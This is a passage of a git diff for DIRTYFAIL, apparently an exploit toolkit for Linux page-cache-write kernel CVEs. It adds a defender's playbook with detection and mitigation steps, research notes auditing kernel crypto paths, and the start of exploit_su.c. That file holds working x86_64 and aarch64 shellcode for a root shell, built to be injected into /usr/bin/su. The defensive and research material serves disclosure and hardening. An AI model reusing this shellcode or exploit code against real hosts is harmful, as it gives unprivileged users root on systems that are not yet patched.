nullok`. */ +df_result_t dirtyfrag_rxrpc_exploit(bool do_shell); +df_result_t dirtyfrag_rxrpc_exploit_inner(void); + +/* Active probe: fires ONE rxkad handshake-forgery trigger against a + * /tmp sentinel (never /etc/passwd). The trigger writes ~8 bytes of + * pcbc(fcrypt)-decrypted ciphertext into the sentinel page; we don't + * need to predict what landed β€” any byte change confirms the kernel + * STORE happened. Skips fcrypt brute force entirely (a random 8-byte + * key is fine for a structural probe). Returns DF_VULNERABLE if the + * sentinel changed, DF_OK if intact, DF_PRECOND_FAIL on AA-block. */ +df_result_t dirtyfrag_rxrpc_active_probe(void); +df_result_t dirtyfrag_rxrpc_active_probe_inner(void); + +#endif diff --git a/modules/copy_fail_family/docs/DEFENDERS.md b/modules/copy_fail_family/docs/DEFENDERS.md new file mode 100644 index 0000000..1ef1b2b --- /dev/null +++ b/modules/copy_fail_family/docs/DEFENDERS.md @@ -0,0 +1,244 @@ +# DIRTYFAIL β€” defender's playbook + +A one-page operational guide for sysadmins assessing and mitigating +exposure to the Copy Fail and Dirty Frag CVE family on Linux hosts. + +If you're operating a fleet of Linux servers, the questions below are +the ones to answer in order. + +--- + +## 1. Am I vulnerable? + +**Quickest answer (no compilation):** + +```bash +curl -sSL https://raw.githubusercontent.com/KaraZajac/DIRTYFAIL/main/tools/dirtyfail-check.sh \ + | bash +``` + +(Read the script first if you don't trust me β€” it's ~150 lines of +plain bash, no curl-pipe-bash voodoo. Read-only on your system.) + +Exit code: `0` mitigated, `1` vulnerable, `2` couldn't determine. + +**Empirical answer (builds the C tool, runs the active probes):** + +```bash +git clone https://github.com/KaraZajac/DIRTYFAIL.git +cd DIRTYFAIL && make +./dirtyfail --scan --active +``` + +The default `--scan` mode runs precondition checks (kernel version, +module presence, LSM state) plus an active probe of the Copy Fail +primitive against a sentinel file in `/tmp`. Adding `--active` extends +the sentinel-STORE probe to the other four primitives (ESP v4, ESP v6, +RxRPC, GCM) β€” this is the only way to distinguish a backported-patched +kernel from an unpatched one without running the full exploit. The +probes only modify temporary files in `/tmp`; `/etc/passwd` is never +touched. + +**Per-CVE breakdown (manual checks):** + +| Question | Command | Vulnerable if | +|---|---|---| +| Is the algif_aead module reachable? | `lsmod \| grep algif_aead` + `grep algif_aead /etc/modprobe.d/*` | Loaded AND not blacklisted | +| Are esp4/esp6 modules reachable? | `modinfo esp4 esp6` | Both present, not blacklisted | +| Is rxrpc reachable? | `lsmod \| grep rxrpc` + `getsockopt(AF_RXRPC, ...)` | Module loadable from unprivileged context | +| Is unprivileged userns hardened? | `cat /proc/sys/kernel/apparmor_restrict_unprivileged_userns` | Returns `0` or file absent | +| Does PAM accept empty passwords? | `grep nullok /etc/pam.d/common-auth` | "nullok" present without "nullok_secure" | + +--- + +## 2. How do I mitigate? + +Three options, listed best-to-worst: + +### A. Apply the upstream kernel patch (best) + +The fix is mainline commit `f4c50a4034e6` (merged 2026-05-07). Each +distro's kernel package is on its own backport timeline: + +| Distro | Status (as of 2026-05-09) | +|---|---| +| Debian 13 (`6.12.86+deb13`) | βœ… patched | +| Ubuntu 24.04 LTS | ❌ not yet patched (kernel 6.8.0-111) | +| Ubuntu 26.04 LTS | ❌ not yet patched (kernel 7.0.0-15.15, predates upstream merge) | +| AlmaLinux 10.1 | ❌ not yet patched (kernel 6.12 EL) | +| Fedora 44 | ❌ not yet patched (kernel 6.19.10) | + +Run `apt list --upgradable linux-image-*` / `dnf check-update kernel` +periodically and apply. + +### B. Layered LSM mitigation (Ubuntu 26.04 model) + +If you're on Ubuntu 24.04 or 26.04, you can replicate Ubuntu 26.04's +defense-in-depth approach without waiting for the kernel patch: + +```bash +# 1. Block unprivileged user namespaces from acquiring caps +echo 'kernel.apparmor_restrict_unprivileged_userns = 1' \ + | sudo tee /etc/sysctl.d/99-userns-restrict.conf +sudo sysctl --system + +# 2. Verify the AA hardening is in effect: +sudo unshare -U -r bash -c 'echo deny > /proc/self/setgroups 2>&1' \ + || echo "OK: unprivileged userns has no caps (mitigation working)" +``` + +This blocks the EXPLOIT INFRASTRUCTURE (no caps in unprivileged +userns), not the underlying kernel bug. Real-root exploitation still +works. + +### C. Module blacklist (`dirtyfail --mitigate` or manual) + +Heaviest hammer β€” blacklists every module that hosts a primitive. +**Side effects: breaks IPsec, AFS, and any userspace using `AF_ALG` +AEAD.** + +Automated: + +```bash +sudo ./dirtyfail --mitigate +``` + +Manual equivalent: + +```bash +sudo tee /etc/modprobe.d/dirtyfail-mitigations.conf <<'EOF' +install algif_aead /bin/false +install esp4 /bin/false +install esp6 /bin/false +install rxrpc /bin/false +EOF + +sudo rmmod algif_aead esp4 esp6 rxrpc 2>/dev/null +sudo sysctl vm.drop_caches=3 +``` + +Undo: `sudo ./dirtyfail --cleanup-mitigate` (or delete the conf +files, then `sudo modprobe ` to reload as needed). + +### D. Disable `pam_unix nullok` + +Optional belt-and-suspenders: even if a page-cache STORE lands, the +exploit relies on PAM's `nullok` flag to convert "empty password +field in /etc/passwd" into a successful `su`. Removing `nullok` from +`/etc/pam.d/common-auth` (Debian/Ubuntu) or `/etc/pam.d/system-auth` +(Red Hat family) closes that step: + +```bash +sudo sed -i 's/\bnullok\b//g' /etc/pam.d/common-auth # Debian/Ubuntu +# Verify a passworded user can still log in normally before logging out! +``` + +--- + +## 3. What should I monitor? + +Even after mitigation, the kernel bug remains until the patch lands. +For detection: + +### auditd rules (universal) + +A ready-to-load rules file ships in `tools/99-dirtyfail.rules`. It +covers six syscall paths used by the exploit chain: XFRM netlink, +add_key(rxrpc), unshare(CLONE_NEWUSER), AF_ALG socket creation, +AppArmor `change_onexec` writes, and direct `/etc/passwd`/`/etc/shadow` +modifications. + +```bash +sudo install -m 0640 tools/99-dirtyfail.rules /etc/audit/rules.d/ +sudo augenrules --load +sudo systemctl restart auditd +``` + +Search for events: + +```bash +# grep is more reliable than ausearch on distros that use ENRICHED +# log_format (Debian 13, Fedora 44 β€” ausearch -k can return "no matches" +# even when SYSCALL events with the key are present in the file). +sudo grep -E 'type=SYSCALL.*key="dirtyfail-' /var/log/audit/audit.log | tail -20 + +# Or per-key, only the most recent entries: +sudo grep 'key="dirtyfail-xfrm"' /var/log/audit/audit.log | tail -5 +sudo grep 'key="dirtyfail-rxkey"' /var/log/audit/audit.log | tail -5 +sudo grep 'key="dirtyfail-userns"' /var/log/audit/audit.log | tail -5 +sudo grep 'key="dirtyfail-afalg"' /var/log/audit/audit.log | tail -5 +``` + +(`sudo ausearch -k ` is the documented tool for this and works on +older distros, but enriched-format compat issues mean `grep` is the +safer default.) + +The `dirtyfail-userns` rule fires on every legitimate `unshare -U` and +rootless container start β€” pair it with `dirtyfail-xfrm` in a SIEM +correlation rule (same auid, both within ~5s) for a high-fidelity +alert. Tuning notes inline in the rules file. + +### eBPF / falco (if you have it) + +Falco's `Sensitive mount opened for writing` and `Detect outbound +connections to common miner pool ports` rule sets won't help directly, +but a custom rule on `unshare(CLONE_NEWUSER)` followed by +`sendto(SOCK_RAW, NETLINK_XFRM)` from a non-zero uid is high-fidelity. + +### Cheap log signal + +```bash +# Hits if our exploit's marker bytes show up in /etc/passwd's page cache +# (run periodically; doesn't catch every variant but is zero-cost) +grep -E '^[^:]+::0:0:|^[^:]+:x:0000:' /etc/passwd +``` + +--- + +## 4. Quick reference card + +``` +SCAN this host: + curl ... | bash # bash check (no compile) + ./dirtyfail --scan # preconds + Copy Fail probe (~1s) + ./dirtyfail --scan --active # all 5 sentinel-STORE probes (~10s) + ./dirtyfail --scan --active --json # same, machine-readable for SIEM + +MITIGATE (Ubuntu / fleet-wide): + sudo ./dirtyfail --mitigate # one-shot defensive deployment + sudo ./dirtyfail --cleanup-mitigate # undo + +MITIGATE (manual, no DIRTYFAIL): + See section 2-C above. + +PATCH: + apt list --upgradable | grep linux-image + dnf check-update kernel + +MONITOR: + /etc/audit/rules.d/99-dirtyfail.rules (see section 3) + +EMERGENCY (suspected compromise via this CVE class): + sudo sysctl vm.drop_caches=3 # evicts page-cache exploits + sudo systemctl restart sshd # forces re-read of /etc/passwd + grep dirtyfail /etc/passwd # check for backdoor user + rm -f /var/tmp/.dirtyfail.state # clean DIRTYFAIL state file +``` + +--- + +## 5. Glossary + +- **Page-cache write**: kernel writes attacker-controlled bytes into the + in-memory copy of a file (`/etc/passwd`, `/usr/bin/su`) without + modifying the file on disk. Persists in RAM until eviction. +- **PAM nullok**: configuration flag that permits authentication for + accounts with an empty password field in `/etc/passwd` (or + `/etc/shadow`). +- **xfrm-ESP**: the kernel's ESP (Encapsulating Security Payload) + implementation in the IPsec stack. The bug class affects in-place + AEAD decrypt over splice-pinned page-cache pages. +- **Userns capability stripping**: kernel-level enforcement that + unprivileged user namespaces have no `CAP_NET_ADMIN` / + `CAP_SYS_ADMIN`, blocking exploit infrastructure even when the + underlying kernel bug is unpatched. diff --git a/modules/copy_fail_family/docs/RESEARCH.md b/modules/copy_fail_family/docs/RESEARCH.md new file mode 100644 index 0000000..1b0bb9e --- /dev/null +++ b/modules/copy_fail_family/docs/RESEARCH.md @@ -0,0 +1,324 @@ +# DIRTYFAIL β€” research notes + +This document captures kernel-source audits and analysis adjacent to +the published CVEs (CVE-2026-31431 / CVE-2026-43284 / CVE-2026-43500). +It's a living research log, not a vendor advisory: findings here are +based on reading mainline kernel source and the disclosed write-ups, +and may need re-verification as the kernel evolves. + +--- + +## Β§1. Adjacent kernel paths β€” audit for the same skb_cow_data() bypass pattern + +### TL;DR + +Ten kernel paths beyond the published CVEs were audited for the +same in-place-AEAD-over-splice-pinned-pages bug class. **All ten +are structurally immune.** No undisclosed CVE candidates surfaced +in this audit; the bug class is genuinely tightly scoped to the +three published sinks plus the algif_aead authencesn/rfc4106-gcm +primitives. + +### The vulnerable pattern + +The CVE-2026-43284-class bug requires all four of: + +1. **In-place AEAD** β€” `aead_request_set_crypt(req, src, dst, ...)` + where `src == dst` or the scatterlists alias the same memory. +2. **Conditional skip-COW** β€” input handler has a branch that bypasses + `skb_cow_data()` on certain skb shapes (typically: non-linear with + no frag_list). +3. **`skb_to_sgvec` over skb frags** β€” the scatterlist passed to the + AEAD is built directly from the skb's frags, so splice-pinned page + references end up in it. +4. **Userspace path to the skb's frags** β€” `splice(2)`, `sendfile(2)`, + or `sendmsg(MSG_SPLICE_PAGES)` can deliver attacker-controlled + page-cache pages into those frags. + +Removing any one of the four breaks the chain. The published CVEs are +the three sinks where all four conditions align (esp_input, esp6_input, +rxkad_verify_packet_1) plus the algif_aead authencesn / rfc4106-gcm +primitives that share the in-place destination scatterlist pattern. + +### Β§1.1 Path-by-path verdict + +| Path | In-place crypto? | skb_cow_data | Splice-reachable? | Verdict | +|---|---|---|---|---| +| esp_input (esp4) | βœ… | conditional skip | yes | **CVE-2026-43284** (patched) | +| esp6_input | βœ… | conditional skip | yes | **CVE-2026-43284 v6** (patched) | +| algif_aead authencesn | βœ… | n/a (different path) | yes via spliceβ†’AF_ALG | **CVE-2026-31431** (patched) | +| algif_aead rfc4106-gcm | βœ… | n/a | yes | **Copy Fail GCM variant** (patched as side-effect of CF revert) | +| rxkad_verify_packet_1 | βœ… | conditional skip | yes via RxRPC handshake | **CVE-2026-43500** (NOT patched as of 2026-05-09) | +| **ah_input (ah4 + ah6)** | βœ… (HMAC, not decrypt) | **UNCONDITIONAL** | n/a | NOT vulnerable β€” structurally immune | +| **ipcomp_input** | ❌ (decompress, separate output pages) | conditional skip | n/a (output is fresh page) | NOT vulnerable β€” separate dst | +| **macsec_decrypt** | βœ… | **UNCONDITIONAL** | no β€” rx skbs come from netdev | NOT vulnerable β€” structurally immune | +| **tls_sw recv decrypt** | βœ… | unconditional, also rx-only | no β€” rx skbs come from TCP rx ring | NOT vulnerable | +| **tls_sw send encrypt + MSG_SPLICE_PAGES** | YES (read-only on user pages) | n/a (msg_en allocated separately) | yes (msg_pl) but only as src | NOT vulnerable β€” separate src/dst | +| **WireGuard `decrypt_packet`** | βœ… ChaCha20Poly1305 in-place | **UNCONDITIONAL** at line 252 | yes via UDP rx (but COW protects) | NOT vulnerable β€” structurally immune | +| **algif_skcipher `_skcipher_recvmsg`** | βœ… symmetric in-place possible | n/a (different module structure) | src yes (TX SGL), dst no (recv iovec) | NOT vulnerable β€” separate src/dst | +| **espintcp** (ESP-in-TCP) | n/a (delegates) | n/a | reaches esp_input via xfrm_rcv_encap | inherits f4c50a4034e6 patch β€” NOT a new CVE | +| **OpenVPN kernel offload `ovpn_aead_decrypt`** | βœ… AEAD in-place | **UNCONDITIONAL** at line 210 | yes via UDP rx (but COW protects) | NOT vulnerable β€” structurally immune | +| **SCTP-AUTH `sctp_auth_calculate_hmac`** | HMAC only (no decrypt, no destination write into skb data frags) | n/a | n/a β€” digest writes to auth chunk header (kernel-allocated), not data frags | NOT vulnerable β€” read-only over data | + +### Β§1.2 Eliminated paths β€” why each is immune + +**`ah_input` (net/ipv4/ah4.c, net/ipv6/ah6.c)** β€” IPsec Authentication +Header. Calls `skb_cow_data(skb, 0, &trailer)` UNCONDITIONALLY before +`skb_to_sgvec_nomark` builds the HMAC scatterlist. No skip-cow branch. +Splice-pinned pages would always be copied into a private buffer +before HMAC verification. + +**`xfrm_ipcomp.c`** β€” IPCOMP decompression has a conditional skip-cow +branch, but the output is allocated as a fresh kernel page +(`alloc_page(GFP_ATOMIC)`) and the destination scatterlist `dsg` is +built separately from the input scatterlist `sg`. Even with +splice-pinned input pages, decompression output goes to fresh pages. +Not in-place over input. + +**`macsec_decrypt` (drivers/net/macsec.c)** β€” MACsec receive AEAD. +Calls `skb_cow_data(skb, 0, &trailer)` unconditionally before +`skb_to_sgvec` and the in-place decrypt. Additionally: macsec rx +skbs come from netdev rx, not from userspace splice β€” the attacker +has no path to plant a page-cache page reference. + +**`tls_sw_recvmsg` (net/tls/tls_sw.c)** β€” kTLS receive AEAD. +kernel.org docs: "To decrypt 'in place' kTLS calls skb_cow_data()." +COW is unconditional on the rx path. Additionally: TLS rx skbs come +from the TCP rx queue, not from splice β€” the only way a user can put +a page-cache page reference into a TCP rx skb is via rare +`SO_PEEK_OFF` / `MSG_PEEK` paths or kernel-side socket forwarding, +neither of which gives the attacker control. + +### Β§1.3 kTLS send via MSG_SPLICE_PAGES β€” closest near-miss + +The kTLS *send* path was modified in 2023 ("splice, net: Handle +MSG_SPLICE_PAGES in AF_TLS", LWN 933386) to support +`MSG_SPLICE_PAGES`, which is the same primitive Dirty Frag and Copy +Fail abuse. This was the most plausible adjacent candidate. + +**Resolved: not vulnerable.** Direct reading of `net/tls/tls_sw.c`: + +- `tls_sw_sendmsg_splice()` adds the user's spliced pages to `msg_pl` + (the plaintext sk_msg buffer) via `sk_msg_page_add()`. +- `tls_alloc_encrypted_msg()` calls + `sk_msg_alloc(sk, msg_en, len, 0)` β€” **fresh kernel pages** for the + encrypted buffer. +- `tls_push_record()` chains the scatterlists: + ```c + sg_chain(rec->sg_aead_out, 2, &msg_en->sg.data[i]); + ``` +- `tls_do_encryption()`: + ```c + aead_request_set_crypt(aead_req, rec->sg_aead_in, + rec->sg_aead_out, data_len, rec->iv_data); + ``` +- `sg_aead_in` (chained from msg_pl, contains user's spliced page) + β‰  `sg_aead_out` (chained from msg_en, kernel-allocated pages). + +The encrypt READS the user's spliced /etc/passwd page but WRITES +ciphertext to `msg_en`'s kernel-allocated pages. The user's +page-cache page is never modified. This is exactly the defense the +algif_aead patch (a664bf3d603d) implemented when it reverted to +out-of-place AEAD; kTLS has had it from inception. + +Compare to the vulnerable `esp_input` pattern: + +```c +/* vulnerable: src == dst */ +skb_to_sgvec(skb, sg, ...); +aead_request_set_crypt(req, sg, sg, ...); +``` + +```c +/* safe: src β‰  dst */ +sg_chain(sg_aead_in, ..., msg_pl); /* user spliced pages */ +sg_chain(sg_aead_out, ..., msg_en); /* kernel private pages */ +aead_request_set_crypt(req, sg_aead_in, sg_aead_out, ...); +``` + +### Β§1.3a WireGuard receive β€” `decrypt_packet()` + +ChaCha20Poly1305 in-place AEAD on incoming UDP skbs. Confirmed +**not vulnerable** β€” `drivers/net/wireguard/receive.c:232–277`: + +```c +static bool decrypt_packet(struct sk_buff *skb, struct noise_keypair *keypair) +{ + struct scatterlist sg[MAX_SKB_FRAGS + 8]; + /* ... */ + offset = -skb_network_offset(skb); + skb_push(skb, offset); + num_frags = skb_cow_data(skb, 0, &trailer); /* line 252, UNCONDITIONAL */ + /* ... */ + sg_init_table(sg, num_frags); + if (skb_to_sgvec(skb, sg, 0, skb->len) <= 0) + return false; + if (!chacha20poly1305_decrypt_sg_inplace(sg, skb->len, NULL, 0, + PACKET_CB(skb)->nonce, + keypair->receiving.key)) + return false; +``` + +`skb_cow_data` at line 252 is UNCONDITIONAL β€” no skip-cow branch. By +the time the in-place AEAD runs, any splice-pinned pages have already +been copied into kernel-private pages. Same defensive pattern as +AH, MACsec, kTLS rx. + +### Β§1.3b algif_skcipher β€” `_skcipher_recvmsg()` + +The companion module to algif_aead, exposing symmetric ciphers +(AES-CBC, AES-CTR, etc.) over AF_ALG. Same author and patchset era +as the in-place optimization that introduced Copy Fail (2017, +72548b093ee3); the Copy Fail upstream fix only reverted algif_aead, +so worth verifying algif_skcipher independently. + +`crypto/algif_skcipher.c:151–152`: + +```c +skcipher_request_set_crypt(&areq->cra_u.skcipher_req, areq->tsgl, + areq->first_rsgl.sgl.sgt.sgl, len, ctx->iv); +``` + +- `areq->tsgl` = TX SGL, populated via `af_alg_pull_tsgl()`. CAN + contain user-spliced page-cache pages (sendmsg + splice path). +- `areq->first_rsgl.sgl.sgt.sgl` = RX SGL, populated via + `af_alg_get_rsgl(sk, msg, ...)` from the user's `recv()` iovec, + via `iov_iter_get_pages` mapping the calling process's anonymous + memory. + +The cipher operation reads from `tsgl` (potentially user-spliced +page-cache pages) and writes to `rsgl` (user's recv buffer in their +own anonymous memory). **src β‰  dst; output never lands on +splice-pinned page-cache pages.** + +Why this differs from algif_aead's Copy Fail: the algif_aead bug was +specifically about the `authencesn` template internally chaining TAG +pages into the destination SGL extension (`req->dst` extends past +the end of `req->src`'s last page into chained tag pages, which +happen to be the source's spliced pages). Plain skcipher has no AEAD +tags, no chained scratch β€” clean src/dst separation. **Not +vulnerable.** + +### Β§1.3c espintcp β€” IPsec ESP over TCP + +`net/xfrm/espintcp.c` is a *transport-layer wrapper* β€” it does no +cryptographic work itself. The `handle_esp()` function delegates +straight to `xfrm6_rcv_encap` / `xfrm4_rcv_encap`, which call into +the standard `esp_input()` / `esp6_input()` handlers. Any skb that +reaches the ESP path through espintcp is processed by the same code +that was patched by f4c50a4034e6 (SKBFL_SHARED_FRAG check). + +**Verdict: not a separate CVE.** On unpatched kernels, espintcp is +just an alternative transport for the existing CVE-2026-43284 sink +(esp_input). On patched kernels the same fix covers both UDP and TCP +encapsulation. The SHARED_FRAG flag is set wherever splice can plant +pages into TCP send buffers, and the producer-side flagging +propagates through TCP into the espintcp path. + +### Β§1.3d OpenVPN kernel offload β€” `ovpn_aead_decrypt()` + +New module in 6.16+ implementing OpenVPN's data channel +(ChaCha20Poly1305 / AES-GCM) in the kernel. Receive AEAD path is in +`drivers/net/ovpn/crypto_aead.c`: + +```c +/* line ~210 */ +nfrags = skb_cow_data(skb, 0, &trailer); /* UNCONDITIONAL */ +/* ... */ +/* line ~228 */ +skb_to_sgvec_nomark(skb, sg + 1, payload_offset, payload_len); +/* ... */ +/* line ~239 */ +aead_request_set_crypt(req, sg, sg, payload_len + tag_size, iv); +``` + +In-place AEAD (`sg, sg`) β€” but `skb_cow_data()` is called +unconditionally before `skb_to_sgvec_nomark` builds the scatterlist. +Splice-pinned pages always copied to kernel-private memory before +the AEAD runs. **Not vulnerable.** Same defensive pattern as +WireGuard, AH, MACsec, kTLS rx. + +### Β§1.3e SCTP-AUTH HMAC validation + +`net/sctp/auth.c:sctp_auth_calculate_hmac()` (lines 606–642) computes +HMAC over an SCTP AUTH chunk: + +```c +data_len = skb_tail_pointer(skb) - (unsigned char *)auth; +digest = (u8 *)(&auth->auth_hdr + 1); +hmac_sha1_usingrawkey(asoc_key->data, asoc_key->len, + (const u8 *)auth, data_len, digest); +``` + +The HMAC is computed READ-ONLY over the skb's chunk data. The +digest output is written to the auth chunk's digest field +(`&auth->auth_hdr + 1`), which on the SEND path lives in +kernel-allocated chunk header memory β€” not in any user-spliced +data fragment. On the RECEIVE path, verification computes HMAC +over received data and compares to the sender-provided digest in a +private buffer β€” pure read. + +The bug class requires a kernel-side WRITE to a splice-pinned page; +SCTP-AUTH only ever READS from skb data and writes the digest to a +kernel-allocated chunk header. **Not vulnerable.** + +### Β§1.4 The protective patterns that distinguish safe from vulnerable + +Every safe path on the list achieves immunity through one of three +mechanisms, each of which removes one of the four required conditions: + +1. **Unconditional `skb_cow_data()`** before any in-place crypto β€” + AH, MACsec, kTLS rx. (Removes condition 2.) +2. **Separate destination scatterlist** allocated from kernel-private + pages β€” kTLS tx, IPCOMP, post-patch algif_aead. + (Removes condition 1.) +3. **The in-place crypto target is fundamentally not a splice-able + skb** β€” kTLS rx skbs come from TCP rx, not user splice. + (Removes condition 4.) + +### Β§1.5 Out-of-scope or low-value candidates + +The candidates that remained after Β§1.3a-e were all eliminated as +not worth a deeper audit: + +- **AF_SMC encryption** β€” uses kTLS/ULP underneath, already covered + by the kTLS audit (Β§1.3 / Β§1.4b). +- **io_uring crypto extensions** β€” would inherit AF_ALG semantics, + already covered by the algif_skcipher audit (Β§1.3b). +- **Bluetooth CMTP/HIDP crypto** β€” privileged-only (HCI device + access), not an unprivileged-LPE vector. +- **Kernel TLS NIC offload** β€” encryption runs on the NIC firmware, + different threat surface entirely (firmware-side bug, not + page-cache-write). +- **dm-crypt / fscrypt** β€” block-layer / filesystem-layer + encryption. Different threat model; user can't splice arbitrary + page-cache pages into block requests in any meaningful way. + +### Β§1.6 Methodology + +For each candidate path, read the input handler and ask: + +1. Does it call `skb_cow_data()` BEFORE building the AEAD + scatterlist? +2. Is there a conditional branch (typically based on `skb_cloned`, + `skb_has_frag_list`, `skb_is_nonlinear`) that bypasses (1)? +3. Is the resulting scatterlist used as BOTH src AND dst of + `aead_request_set_crypt()` / equivalent? +4. Can a userspace primitive (`splice(2)`, `sendfile(2)`, + `sendmsg(MSG_SPLICE_PAGES)`, AF_ALG send) deliver + attacker-controlled pages into the input skb's frags? + +All four must be true for the bug class to apply. A single "no" is +sufficient for "not vulnerable." + +--- + +## Β§2. References + +- V4bel/dirtyfrag write-up β€” [github.com/V4bel/dirtyfrag/blob/master/assets/write-up.md](https://github.com/V4bel/dirtyfrag/blob/master/assets/write-up.md) +- Theori/Xint Copy Fail disclosure β€” [xint.io/blog/copy-fail-linux-distributions](https://xint.io/blog/copy-fail-linux-distributions) +- LWN β€” Replace sendpage with sendmsg(MSG_SPLICE_PAGES) β€” [lwn.net/Articles/928487](https://lwn.net/Articles/928487/) +- LWN β€” Handle MSG_SPLICE_PAGES in AF_TLS β€” [lwn.net/Articles/933386](https://lwn.net/Articles/933386/) +- TLS 1.3 Rx improvements (Kicinski) β€” [people.kernel.org/kuba/tls-1-3-rx-improvements-in-linux-5-20](https://people.kernel.org/kuba/tls-1-3-rx-improvements-in-linux-5-20) +- 0xdeadbeefnetwork Copy_Fail2 (GCM variant) β€” [github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo](https://github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo) +- Linux source (torvalds/master) β€” `net/ipv4/ah4.c`, `net/ipv6/ah6.c`, `net/xfrm/xfrm_ipcomp.c`, `drivers/net/macsec.c`, `net/tls/tls_sw.c` diff --git a/modules/copy_fail_family/exploit_su.c b/modules/copy_fail_family/exploit_su.c new file mode 100644 index 0000000..043cecf --- /dev/null +++ b/modules/copy_fail_family/exploit_su.c @@ -0,0 +1,530 @@ +/* + * DIRTYFAIL β€” exploit_su.c + * + * V4bel-style page-cache shellcode injection against /usr/bin/su. + * See exploit_su.h for the high-level rationale. + */ + +#include "exploit_su.h" +#include "copyfail.h" +#include "common.h" + +#ifdef __linux__ +#include +#include +#include +#include +#include +#include +#include +#include + +#define SU_PATH "/usr/bin/su" +#define STATE_PATH "/var/tmp/.dirtyfail-su.state" +#define STATE_MAGIC "DFSU0001" + +/* x86_64 shellcode: setuid(0); setgid(0); execve("/bin/sh", argv, NULL) + * with argv = ["/bin/sh", NULL]. The proper argv matters: NULL argv + * makes the kernel substitute argv[0]="" (printk: "launched '/bin/sh' + * with NULL argv: empty string added"), and bash/sh-as-init-script + * with empty argv[0] doesn't read commands from stdin reliably. + * + * Layout: + * 0x00 xor rdi, rdi ; mov eax, 105 ; syscall β€” setuid(0) [10] + * 0x0a xor rdi, rdi ; mov eax, 106 ; syscall β€” setgid(0) [10] + * 0x14 mov rbx, "/bin/sh\0" ; push rbx β€” pathname on stack [11] + * 0x1f mov r9, rsp β€” r9 = path ptr [3] + * 0x22 xor rax, rax ; push rax ; push r9 β€” argv = [path,NULL][6] + * 0x28 mov rsi, rsp ; mov rdi, r9 β€” argv, pathname [6] + * 0x2e xor rdx, rdx ; mov eax, 0x3b ; syscall β€” envp=NULL, execve [10] + * + * Total: 56 bytes = 14 chained 4-byte writes via cf_4byte_write. */ +__attribute__((unused)) +static const unsigned char shellcode_x86_64[56] = { + /* setuid(0) β€” 10 bytes */ + 0x48,0x31,0xff, + 0xb8,0x69,0x00,0x00,0x00, + 0x0f,0x05, + /* setgid(0) β€” 10 bytes */ + 0x48,0x31,0xff, + 0xb8,0x6a,0x00,0x00,0x00, + 0x0f,0x05, + /* mov rbx, "/bin/sh\0" ; push rbx β€” 11 bytes */ + 0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00, + 0x53, + /* mov r9, rsp β€” 3 bytes */ + 0x49,0x89,0xe1, + /* xor rax, rax ; push rax ; push r9 β€” 6 bytes */ + 0x48,0x31,0xc0, + 0x50, + 0x41,0x51, + /* mov rsi, rsp ; mov rdi, r9 β€” 6 bytes */ + 0x48,0x89,0xe6, + 0x4c,0x89,0xcf, + /* xor rdx, rdx ; mov eax, 0x3b ; syscall β€” 10 bytes */ + 0x48,0x31,0xd2, + 0xb8,0x3b,0x00,0x00,0x00, + 0x0f,0x05, +}; + +/* aarch64 shellcode: same semantics as x86_64 above (setuid(0), + * setgid(0), execve("/bin/sh", ["/bin/sh", NULL], NULL)) encoded for + * the aarch64 syscall ABI (x8 = syscall number, x0..x5 = args, + * `svc #0` to invoke). 20 instructions Γ— 4 bytes = 80 bytes. + * + * STATUS: UNTESTED on hardware. The bytes were derived by manually + * cross-referencing each instruction against the ARMv8-A reference + * manual; the matching assembly source ships in + * `tools/exploit_su_aarch64.S` so anyone with `aarch64-linux-gnu-as` + * can regenerate and verify. Runtime is gated behind the env var + * `DIRTYFAIL_AARCH64_TRUST_UNTESTED=1` to prevent accidental use. */ +__attribute__((unused)) +static const unsigned char shellcode_aarch64[80] = { + /* setuid(0) β€” movz x0,#0 ; movz x8,#146 ; svc #0 */ + 0x00,0x00,0x80,0xd2, + 0x48,0x12,0x80,0xd2, + 0x01,0x00,0x00,0xd4, + /* setgid(0) β€” movz x0,#0 ; movz x8,#144 ; svc #0 */ + 0x00,0x00,0x80,0xd2, + 0x08,0x12,0x80,0xd2, + 0x01,0x00,0x00,0xd4, + /* "/bin/sh\0" -> x9 (4Γ— movz/movk lsl) */ + 0xe9,0x45,0x8c,0xd2, /* movz x9, #0x622f */ + 0x29,0xcd,0xad,0xf2, /* movk x9, #0x6e69, lsl 16 */ + 0xe9,0x65,0xce,0xf2, /* movk x9, #0x732f, lsl 32 */ + 0x09,0x0d,0xe0,0xf2, /* movk x9, #0x0068, lsl 48 */ + /* push string : sp -= 16 ; *sp = x9 */ + 0xe9,0x0f,0x1f,0xf8, /* str x9, [sp, #-16]! */ + 0xe9,0x03,0x00,0x91, /* mov x9, sp */ + /* argv = [x9, NULL] on stack */ + 0xff,0x43,0x00,0xd1, /* sub sp, sp, #16 */ + 0xff,0x07,0x00,0xf9, /* str xzr, [sp, #8] */ + 0xe9,0x03,0x00,0xf9, /* str x9, [sp, #0] */ + /* execve(x9, sp, NULL) β€” syscall 221 */ + 0xe0,0x03,0x09,0xaa, /* mov x0, x9 */ + 0xe1,0x03,0x00,0x91, /* mov x1, sp */ + 0xe2,0x03,0x1f,0xaa, /* mov x2, xzr */ + 0xa8,0x1b,0x80,0xd2, /* movz x8, #221 */ + 0x01,0x00,0x00,0xd4, /* svc #0 */ +}; + +/* Build-time arch selection: pick the right shellcode at compile time + * based on the target architecture. SHELLCODE_LEN must be a multiple + * of 4 since cf_4byte_write plants 4 bytes at a time. The unused + * sibling shellcode array is suppressed with __attribute__((unused)) + * up at its definition. */ +#if defined(__x86_64__) || defined(__amd64__) +# define SHELLCODE_BYTES shellcode_x86_64 +# define SHELLCODE_LEN ((int)sizeof(shellcode_x86_64)) +# define SHELLCODE_ARCH "x86_64" +# define SHELLCODE_TESTED 1 +# define SHELLCODE_PRESENT 1 +#elif defined(__aarch64__) +# define SHELLCODE_BYTES shellcode_aarch64 +# define SHELLCODE_LEN ((int)sizeof(shellcode_aarch64)) +# define SHELLCODE_ARCH "aarch64" +# define SHELLCODE_TESTED 0 +# define SHELLCODE_PRESENT 1 +#else +# define SHELLCODE_BYTES shellcode_x86_64 /* placeholder, never used */ +# define SHELLCODE_LEN 0 +# define SHELLCODE_ARCH "unknown" +# define SHELLCODE_TESTED 0 +# define SHELLCODE_PRESENT 0 +#endif + +/* Convenience name kept matching pre-existing usages. */ +#define shellcode SHELLCODE_BYTES + +/* State file: stash original entry-point bytes so we can revert. */ +struct su_state { + char magic[8]; /* "DFSU0001" */ + char target_path[256]; + uint64_t file_offset; + uint64_t original_len; /* 